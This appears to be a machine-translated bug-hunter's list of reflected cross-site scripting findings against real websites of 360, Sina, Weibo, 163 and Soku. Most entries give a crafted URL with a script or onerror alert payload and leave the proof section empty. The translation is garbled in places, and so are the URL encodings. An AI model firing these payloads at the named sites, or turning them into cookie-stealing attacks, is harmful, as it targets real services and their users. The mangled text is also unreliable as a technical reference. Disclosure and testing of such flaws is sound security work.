Xss small set

360 xss

Vulnerability Website: http://dev.app.360.cn

Vulnerability reproduction: http://dev.app.360.cn/seriesnum/api? Appkey = 02a051317dd72145920.ecc8e6e77abf & status = 1 & product_id = Grsm_02 & is_real = 0 & callback = % 3 Cscript % 3 Ealert % 281% 29% 3C/script % 3E

Proof of vulnerability:

 

Vulnerability Website: http://wangzhan.360.cn

Vulnerability reproduction: http://wangzhan.360.cn/index.php/abc/abc/abc/%22%3E%3Cscript%3Ealert%28%2fqingsh4n%2f%29%3C%2fscript%3E%2f%2f

Proof of vulnerability:

Ps: the above two have been completed, and two USB flash drives have been rubbed.

 

Sina xss

Vulnerability Website: http://common.fj.sina.com.cn/

Vulnerability reproduction:

Http://common.fj.sina.com.cn/index.php/201209room/interfaces/vote_entry? Callback = % 2B % 2Fv8% 20% bytes

Proof of vulnerability:

Vulnerability Website: http://qing.weibo.com/

Vulnerability reproduction: http://qing.weibo.com/2389286414/8e699e0e34002bsw.html

Proof of vulnerability:

 

163 xss

Vulnerability Website: http://blog.163.com

Vulnerability reproduction:

Http://blog.163.com/s/musicWrap.s? N = % B1q % C0Y % A6A % A8 % D3 & a = % BCB % C5w & t = lrc & event = qingshen & _ jsonType = 2

Proof of vulnerability:

 

Soku xss

Vulnerability Website: http://www.soku.com/

Vulnerability reproduction:

Http://www.soku.com/t/nisearch/%22%3E%3Cimg%20src=1%20onerror=alert (1) % 3E ///

Proof of vulnerability: